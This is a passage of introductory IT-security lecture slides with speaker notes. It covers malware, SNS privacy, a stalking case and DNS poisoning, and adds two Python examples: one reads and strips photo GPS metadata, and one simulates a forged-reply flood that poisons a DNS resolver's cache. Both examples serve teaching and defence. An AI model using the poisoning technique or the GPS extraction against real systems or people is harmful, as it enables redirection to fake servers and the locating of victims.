• 46. Safe recovery procedure from infection: 1. format the hard disk (not a quick format); 2. install the system from read-only media; 3. patch it; 4. recover data from backup (note: backups can be contaminated, so scan them before restoring).
• 47. Recovery from system troubles: Mac OS X: Time Machine is helpful. Windows 7: System Restore, System Recovery.
  • 48. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
• 49. SNS problems: Privacy problems; Cyberstalking; Flaming (a tweet can cause flaming); Sexting/Revenge porn. A leak to the Internet is unrecoverable!
• 50. Stalking case in Zushi: The murderer posted tweets to SNS asking for the victim's address. He also used a popular FAQ site to find the victim's address. He also used a private detective. (Zushi case in a newspaper)
• 51. Don'ts in using SNS: disclose location information or other private matters (check the EXIF of digital photos: it may carry GPS coordinates); retweet or reply to someone asking for another person's address or private information; post private photos of yourself or your friends. For more, refer to this site.
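A photo taken with a smartphone usually carries the GPS position of the camera in its Exif metadata, which is exactly the location information the slide warns against disclosing. The following script is an added example, not part of the lecture: it parses the Exif APP1 segment of a JPEG with only the standard library, reads the GPS IFD, and strips the metadata before posting. The sample "photo" is constructed inline (an Exif header with coordinates near Zushi and no image data); the coordinates and the helper names are assumptions.

```python
import struct

GPS_IFD_POINTER = 0x8825
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004


def _segments(jpeg: bytes):
    """Yield (marker, raw_segment) for each JPEG marker segment up to the scan data,
    then (None, remaining_bytes) so callers can copy the rest verbatim."""
    pos = 2  # skip SOI (FF D8)
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xD9 or 0xD0 <= marker <= 0xD7:  # EOI / RSTn carry no length field
            yield marker, jpeg[pos:pos + 2]
            pos += 2
            continue
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield marker, jpeg[pos:pos + 2 + length]
        pos += 2 + length
        if marker == 0xDA:  # SOS: entropy-coded image data follows, no more headers
            break
    yield None, jpeg[pos:]


def _read_ifd(tiff: bytes, endian: str, offset: int) -> dict:
    """Return {tag: (type, count, 4-byte value-or-offset field)} for one IFD."""
    (n,) = struct.unpack(endian + "H", tiff[offset:offset + 2])
    entries = {}
    for i in range(n):
        e = offset + 2 + 12 * i
        tag, typ, count = struct.unpack(endian + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, count, tiff[e + 8:e + 12])
    return entries


def _rationals(tiff: bytes, endian: str, count: int, field: bytes) -> list[float]:
    (off,) = struct.unpack(endian + "I", field)
    vals = []
    for i in range(count):
        num, den = struct.unpack(endian + "II", tiff[off + 8 * i:off + 8 * i + 8])
        vals.append(num / den if den else 0.0)
    return vals


def extract_gps(jpeg: bytes):
    """Return (latitude, longitude) in decimal degrees, or None if the photo has no GPS tags."""
    if jpeg[:2] != b"\xff\xd8":
        return None
    tiff = None
    for marker, seg in _segments(jpeg):
        if marker == 0xE1 and seg[4:10] == b"Exif\x00\x00":
            tiff = seg[10:]
            break
    if tiff is None or tiff[:2] not in (b"II", b"MM"):
        return None
    endian = "<" if tiff[:2] == b"II" else ">"
    (ifd0_off,) = struct.unpack(endian + "I", tiff[4:8])
    ifd0 = _read_ifd(tiff, endian, ifd0_off)
    if GPS_IFD_POINTER not in ifd0:
        return None
    (gps_off,) = struct.unpack(endian + "I", ifd0[GPS_IFD_POINTER][2])
    gps = _read_ifd(tiff, endian, gps_off)
    if not all(t in gps for t in (GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON)):
        return None

    def to_decimal(tag, ref_tag):
        d, m, s = _rationals(tiff, endian, gps[tag][1], gps[tag][2])
        value = d + m / 60 + s / 3600
        return -value if gps[ref_tag][2][:1] in (b"S", b"W") else value

    return to_decimal(GPS_LAT, GPS_LAT_REF), to_decimal(GPS_LON, GPS_LON_REF)


def strip_exif(jpeg: bytes) -> bytes:
    """Drop every APP1 segment (Exif, XMP) before a photo is posted; image data is untouched."""
    if jpeg[:2] != b"\xff\xd8":
        return jpeg
    return b"\xff\xd8" + b"".join(seg for marker, seg in _segments(jpeg) if marker != 0xE1)


def build_sample_jpeg(lat_dms, lat_ref, lon_dms, lon_ref) -> bytes:
    """Constructed sample: SOI + one Exif APP1 (little-endian TIFF with a GPS IFD) + EOI.
    There is no image data; only the metadata layout matters for this demonstration."""
    e = "<"
    entry = lambda tag, typ, count, value4: struct.pack(e + "HHI", tag, typ, count) + value4
    rationals = lambda dms: b"".join(struct.pack(e + "II", int(v), 1) for v in dms)
    ifd0_off = 8
    gps_off = ifd0_off + 2 + 1 * 12 + 4   # IFD0 holds one entry (the GPS pointer)
    data_off = gps_off + 2 + 4 * 12 + 4   # GPS IFD holds four entries
    tiff = b"II" + struct.pack(e + "HI", 42, ifd0_off)
    tiff += struct.pack(e + "H", 1) + entry(GPS_IFD_POINTER, 4, 1, struct.pack(e + "I", gps_off)) + struct.pack(e + "I", 0)
    tiff += struct.pack(e + "H", 4)
    tiff += entry(GPS_LAT_REF, 2, 2, lat_ref.encode() + b"\x00\x00\x00")
    tiff += entry(GPS_LAT, 5, 3, struct.pack(e + "I", data_off))
    tiff += entry(GPS_LON_REF, 2, 2, lon_ref.encode() + b"\x00\x00\x00")
    tiff += entry(GPS_LON, 5, 3, struct.pack(e + "I", data_off + 24))
    tiff += struct.pack(e + "I", 0)
    assert len(tiff) == data_off
    tiff += rationals(lat_dms) + rationals(lon_dms)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    photo = build_sample_jpeg((35, 17, 44), "N", (139, 34, 49), "E")  # constructed, near Zushi
    print("GPS in original :", extract_gps(photo))
    print("GPS after strip :", extract_gps(strip_exif(photo)))
```

Many SNS services strip Exif on upload, but not all do, and a photo sent by mail or chat keeps it; strip it yourself before sharing.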
  • 52. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem of DNS Concluding remarks
• 53. The basic problem on the Internet: DNS is the protocol and system that converts domain names to IP addresses. Ill-configured or ill-managed home routers can be compromised easily, and intruders may change the DNS server configuration. It happened in Mexico. DNS poisoning is easy: send a fake query and at the same time generate and send fake answers (a resolver accepts a reply whenever its 16-bit transaction ID and the port match). If poisoned, users of the poisoned server can be led to a fake server, and you can imagine what happens.
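To make "send a fake query and at the same time send fake answers" concrete, here is a simulation added as an example (not part of the lecture): a minimal caching resolver that accepts the first reply matching the query name, transaction ID and port, an attacker who asks the resolver for a name and then floods it with forged answers for every possible 16-bit transaction ID, and the authoritative answer arriving afterwards. With a fixed source port the flood always wins; with source-port randomization the attacker must also guess the port. The names and addresses are constructed (documentation ranges), and the ephemeral-port range is an assumption.

```python
from dataclasses import dataclass, field

TXID_SPACE = 1 << 16                 # the DNS transaction ID is 16 bits
EPHEMERAL_PORTS = 65535 - 1024 + 1   # assumed source-port range when the resolver randomizes it


@dataclass(frozen=True)
class DnsResponse:
    qname: str
    txid: int
    dst_port: int    # must equal the source port the resolver used for its query
    answer: str
    origin: str      # "attacker" or "authoritative": for the simulation only, a resolver cannot tell


@dataclass
class CachingResolver:
    """Minimal resolver: one outstanding query; the first reply matching qname,
    transaction ID and destination port is cached, everything else is dropped."""
    qname: str
    txid: int
    src_port: int
    cache: dict = field(default_factory=dict)
    answered: bool = False

    def receive(self, resp: DnsResponse) -> bool:
        if self.answered:
            return False
        if (resp.qname, resp.txid, resp.dst_port) != (self.qname, self.txid, self.src_port):
            return False
        self.cache[self.qname] = resp.answer
        self.answered = True
        return True


def forge_responses(qname: str, guessed_port: int, evil_ip: str, txids) -> list:
    """The attacker cannot see the real query, so it sprays every transaction ID it can."""
    return [DnsResponse(qname, t, guessed_port, evil_ip, "attacker") for t in txids]


def race(resolver: CachingResolver, forged: list, legit: DnsResponse) -> str:
    """The attacker triggered the query itself, so its flood arrives before the real answer."""
    for resp in forged:
        if resolver.receive(resp):
            break
    resolver.receive(legit)   # ignored if the cache is already poisoned
    return resolver.cache[resolver.qname]


def success_probability(forged_count: int, port_randomized: bool) -> float:
    """Chance that one flood of forged_count replies hits the right (txid, port) pair."""
    space = TXID_SPACE * (EPHEMERAL_PORTS if port_randomized else 1)
    return min(1.0, forged_count / space)


if __name__ == "__main__":
    qname, legit_ip, evil_ip = "www.bank.example", "203.0.113.10", "198.51.100.66"
    flood = forge_responses(qname, 53, evil_ip, range(TXID_SPACE))
    fixed = CachingResolver(qname, txid=0x1A2B, src_port=53)
    print("fixed port 53     ->", race(fixed, flood, DnsResponse(qname, 0x1A2B, 53, legit_ip, "authoritative")))
    rnd = CachingResolver(qname, txid=0x1A2B, src_port=40321)
    print("random port 40321 ->", race(rnd, flood, DnsResponse(qname, 0x1A2B, 40321, legit_ip, "authoritative")))
    print("p(success) fixed / random:", success_probability(TXID_SPACE, False), success_probability(TXID_SPACE, True))
```

The lesson for a home router or small office resolver is that a 16-bit ID alone is no protection; source-port randomization (and DNSSEC, which validates the answer itself) is what makes the flood impractical.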
  • 56. Agenda Keywords in Security Current trends in security Current topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
• 57. Concluding Remarks Severe problems of the Internet were found in 2014. The ID and password system may come to an end. Many new malware and tools are developed daily. Be careful when you post on SNS etc. Check and maintain your home routers, network-attached storage, TV sets, video recorders, etc. properly. Basic knowledge of Internet technology is important for your safety.

Editor's Notes

  • #3: Do you remember the Y2K problem? About fifteen years ago, it was said that the date function of many computers, including embedded microprocessors, would become faulty at midnight of the last day of 1999. At that time, in many computer programs only two digits were provided to store the year part of date and time data, to save computer memory. At midnight, 99 would change to 00, and it was believed that this would cause logical errors in many computer programs. But nothing happened. At that time, though, we had many attacks and password-cracking attempts trying to get control of networked computers.
  • #4: Today I will talk about these topics. First I'll present a few basic concepts in computer and network security.
  • #5: English is very convenient, because we can distinguish between the term "internet" or "internetworking" and the Internet. The term internet or internetworking means the idea or concept of connecting computer networks. On the other hand, the proper noun the Internet is a global network made by connecting existing smaller IP networks. The Internet is not the Web system nor Web browsing; the Internet is the infrastructure of these applications. We can watch and buy movies and music through the Internet. Television sets, video recorders and air conditioners are now connected to the Internet and controlled through it. But these become another security risk.
  • #6: CIA is the keyword of security. C for confidentiality: avoid sniffing of confidential information; limit access to the confidential information. Integrity: keep track of changes.
  • #8: Now I will show you current trends and topics in IT security. Last year, severe bugs and defects were found in basic software and protocols on which the Internet depends.
  • #26: Malware is a generic name for software that is installed without consent and harms computers. Current malware has become complicated and has many functions, so it does not fit neatly into this classification.
  • #27: Old computer viruses displayed messages or simple animations on the PC screen. They were developed out of their developers' technical interest, to demonstrate their technical capabilities. For that reason, old-style viruses were very active in copying themselves to other files or other systems, so such viruses could be found easily by monitoring the infected system's behavior or network traffic. However, current viruses do their work quietly to avoid discovery, and update themselves through the network. They may be part of so-called botnets. It is thought that anti-virus software can find only 70% of existing viruses. New viruses increase daily. One can buy viruses or virus-generation tools on the market; it is said that a virus costs several hundred yen. CodeRed and Nimda were notable ones.
  • #28: A worm is a program that replicates itself to other systems by using security holes. It may carry payloads. The major payload of a worm is a "backdoor" program. When a backdoor program is installed, it reports the IP address of the infected computer to the worm's developer and waits for commands from him or her. Slammer and Blaster were well known.
  • #29: The Trojan horse is named after the Greek myth. A Trojan horse looks like a useful program, but malicious code is inside it. This type of software does not have the ability of self-replication or infection like viruses or worms.
  • #30: Spyware is software that spies on the system on which it is installed. Adware displays advertisements on the screen. This type of software is malicious only when it is installed without the consumer's consent. Much free software does such things, but we may choose to use it in exchange for giving our private information or accepting advertisements; that is why it is free. Much smartphone software has such abilities too. Of course, good developers of such software declare what their software does.
  • #31: Have you ever seen a red or yellow alert popping up during web surfing? Such an alert informs you that your system has been found infected or needs garbage collection, and recommends downloading and installing a piece of software. Ransomware is software that limits access to the computer it infects, and demands a ransom paid to the developer to remove the limitation it set. Cryptware is a kind of ransomware: it encrypts files on the system it infects and demands money to decrypt them. You are lucky if you get control of your computer back by paying. To avoid this type of software, ignore such pop-up alerts.
  • #32: Animals gather at the watering hole to drink. A lion may catch prey easily by waiting there.
  • #33: This type of attack is prepared carefully and precisely. Attackers first get control of web sites that the victims often visit. Then they set malware to be pushed to the victims' browsers when they visit those sites again. Such malware is crafted and customized to fit the victims' culture, so it is very difficult to find with ordinary anti-malware. Such targeted attacks are called spear attacks.
  • #34: GOM Player is popular software for viewing video content; it can handle many video formats. Its distribution site was compromised and contaminated files were placed there. EmEditor is a quite useful text editor. When the software starts, it accesses its site to check whether updates are available. The attacker used this function to install malware. I heard that no users were infected, because the malware was designed to work only when accesses came from a few specific sites.
  • #36: Software has bugs. Some bugs cause severe security problems; such a bug is called a security hole. So bug fixes are necessary to keep the system safe and sound. Microsoft releases software updates on every second Tuesday; the day is called black Tuesday (Patch Tuesday). In Japan, it is Wednesday. But do not try to update on that day. Windows Update may cause trouble, because the updates themselves may have bugs. The latest Windows update, released last December, caused hang-ups on many computers. Recovery from troubles in a software update is a hard task, so wait several days or a week before updating.
  • #37: Completely bug-free software does not exist.
  • #39: The IP addresses of the routers are the same. I left my office to go home. When I came back home and connected my computer to my home LAN, a red alert popped up telling me that my home router had been cracked, and the software told me that it was blocking all network connections. The reason is simple, but I couldn't find a way to unlock the situation, so I had to uninstall the software.
  • #40: Updates of the Firefox browser are frequent. When she started Firefox, it told her that an update was available, so she did the update. The next time she started Firefox, she saw a pop-up alert displayed by her anti-virus software. It told her that the browser had been modified recently and might have been poisoned. We may click "yes" to such a query, because almost all such queries expect "yes" by default. But in this case, she should have selected the "No" button to continue using Firefox. Our default action, clicking "yes" to any query, may harm.
  • #41: "RequestPolicy" is a tool to avoid off-site JavaScript like "Google search", "Google Analytics", "DoubleClick", and so on. Allowing such scripts may cause privacy or security problems; cookies may be extracted when browsing such sites.
  • #45: If
  • #46: If your system is infected by malware, stop using the system and call the appropriate person for consultation. If your organization provides an incident handling guideline, you should follow its procedure.
  • #48: Software updates by the manufacturer sometimes cause system trouble like a blue screen. In such a case, you should recover your system from so-called "Safe mode". If the system comes up, we are very lucky. On Windows, we can use "System Restore" to undo the changes made on the system. On Mac, "Time Machine" is helpful.